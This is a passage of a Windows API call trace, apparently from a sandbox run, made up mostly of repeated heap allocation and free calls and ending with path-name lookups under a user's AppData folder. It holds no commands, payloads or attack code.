lpMem=0xd2ed00 | out: hHeap=0xcd0000) returned 1 [0172.098] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed00 [0172.098] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.098] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.098] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed00 | out: hHeap=0xcd0000) returned 1 [0172.098] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed00 [0172.098] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.098] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b4b098 [0172.098] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.098] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.098] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed00 | out: hHeap=0xcd0000) returned 1 [0172.098] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed00 [0172.098] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.098] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.098] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed00 | out: hHeap=0xcd0000) returned 1 [0172.098] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed00 [0172.098] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.098] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.098] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed00 | out: hHeap=0xcd0000) returned 1 [0172.098] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed00 [0172.098] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.098] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.098] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed00 | out: hHeap=0xcd0000) returned 1 [0172.098] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed00 [0172.098] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.098] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.098] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed00 | out: hHeap=0xcd0000) returned 1 [0172.098] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed00 [0172.098] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.098] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.098] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed00 | out: hHeap=0xcd0000) returned 1 [0172.099] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed00 [0172.099] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.099] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.099] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed00 | out: hHeap=0xcd0000) returned 1 [0172.099] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed00 [0172.099] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.099] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.099] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed00 | out: hHeap=0xcd0000) returned 1 [0172.099] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed00 [0172.099] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.099] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.099] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed00 | out: hHeap=0xcd0000) returned 1 [0172.099] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed00 [0172.099] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.099] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.099] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed00 | out: hHeap=0xcd0000) returned 1 [0172.099] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed00 [0172.099] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.099] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.099] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed00 | out: hHeap=0xcd0000) returned 1 [0172.099] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed00 [0172.099] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.099] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.099] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed00 | out: hHeap=0xcd0000) returned 1 [0172.099] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed00 [0172.099] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.099] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.099] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed00 | out: hHeap=0xcd0000) returned 1 [0172.099] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed00 [0172.099] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.099] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.099] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed00 | out: hHeap=0xcd0000) returned 1 [0172.099] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed00 [0172.099] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.099] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.099] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed00 | out: hHeap=0xcd0000) returned 1 [0172.099] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed00 [0172.100] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.100] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.100] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed00 | out: hHeap=0xcd0000) returned 1 [0172.100] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed00 [0172.100] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.100] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0172.100] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.100] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.100] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed00 | out: hHeap=0xcd0000) returned 1 [0172.100] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed00 [0172.100] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.100] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.100] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed00 | out: hHeap=0xcd0000) returned 1 [0172.100] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed00 [0172.100] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.100] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b4b098 [0172.100] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.100] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.100] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed00 | out: hHeap=0xcd0000) returned 1 [0172.100] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed00 [0172.100] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.100] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.100] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed00 | out: hHeap=0xcd0000) returned 1 [0172.100] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed00 [0172.100] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.100] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.100] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed00 | out: hHeap=0xcd0000) returned 1 [0172.100] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed00 [0172.100] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.100] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.100] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed00 | out: hHeap=0xcd0000) returned 1 [0172.100] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed00 [0172.100] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.100] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.100] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed00 | out: hHeap=0xcd0000) returned 1 [0172.101] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed00 [0172.101] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.101] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0172.101] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.101] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.101] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed00 | out: hHeap=0xcd0000) returned 1 [0172.101] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed00 [0172.101] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.101] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.101] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed00 | out: hHeap=0xcd0000) returned 1 [0172.101] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed00 [0172.101] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.101] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.101] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed00 | out: hHeap=0xcd0000) returned 1 [0172.101] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed00 [0172.101] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.101] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.101] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed00 | out: hHeap=0xcd0000) returned 1 [0172.101] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed00 [0172.101] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.101] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.101] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed00 | out: hHeap=0xcd0000) returned 1 [0172.101] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed00 [0172.101] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.101] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.101] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed00 | out: hHeap=0xcd0000) returned 1 [0172.101] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed00 [0172.101] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.101] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.101] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed00 | out: hHeap=0xcd0000) returned 1 [0172.101] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed00 [0172.101] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.101] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.101] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed00 | out: hHeap=0xcd0000) returned 1 [0172.101] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed00 [0172.101] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.101] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.101] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed00 | out: hHeap=0xcd0000) returned 1 [0172.101] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed00 [0172.101] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.102] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.102] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed00 | out: hHeap=0xcd0000) returned 1 [0172.102] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed00 [0172.102] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.102] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0172.102] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.102] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.102] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed00 | out: hHeap=0xcd0000) returned 1 [0172.102] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed00 [0172.102] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.102] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.102] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed00 | out: hHeap=0xcd0000) returned 1 [0172.102] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed00 [0172.102] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.102] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.102] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed00 | out: hHeap=0xcd0000) returned 1 [0172.102] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed00 [0172.102] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.102] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.102] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed00 | out: hHeap=0xcd0000) returned 1 [0172.102] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed00 [0172.102] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.102] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.102] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed00 | out: hHeap=0xcd0000) returned 1 [0172.102] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed00 [0172.102] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.102] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.102] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed00 | out: hHeap=0xcd0000) returned 1 [0172.102] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed00 [0172.102] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.102] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0172.102] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.102] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.102] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed00 | out: hHeap=0xcd0000) returned 1 [0172.103] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed00 [0172.103] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.103] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.103] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed00 | out: hHeap=0xcd0000) returned 1 [0172.103] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed00 [0172.103] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.103] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.103] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed00 | out: hHeap=0xcd0000) returned 1 [0172.103] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed00 [0172.103] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.103] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.103] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed00 | out: hHeap=0xcd0000) returned 1 [0172.103] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed00 [0172.103] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.103] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.103] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed00 | out: hHeap=0xcd0000) returned 1 [0172.103] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed00 [0172.103] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.103] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.103] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed00 | out: hHeap=0xcd0000) returned 1 [0172.103] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed00 [0172.103] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.103] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.103] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed00 | out: hHeap=0xcd0000) returned 1 [0172.103] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed00 [0172.103] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.103] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.103] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed00 | out: hHeap=0xcd0000) returned 1 [0172.103] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed00 [0172.103] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.103] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.103] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed00 | out: hHeap=0xcd0000) returned 1 [0172.103] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed00 [0172.103] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.103] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.103] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed00 | out: hHeap=0xcd0000) returned 1 [0172.103] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed00 [0172.104] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.104] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0172.104] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.104] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.104] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed00 | out: hHeap=0xcd0000) returned 1 [0172.104] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed00 [0172.104] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.104] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.104] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed00 | out: hHeap=0xcd0000) returned 1 [0172.104] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed00 [0172.104] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.104] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.104] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed00 | out: hHeap=0xcd0000) returned 1 [0172.104] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed00 [0172.104] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.104] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.104] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed00 | out: hHeap=0xcd0000) returned 1 [0172.104] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed00 [0172.104] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.104] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.104] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed00 | out: hHeap=0xcd0000) returned 1 [0172.104] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed00 [0172.104] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0172.104] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0172.104] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0172.104] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") 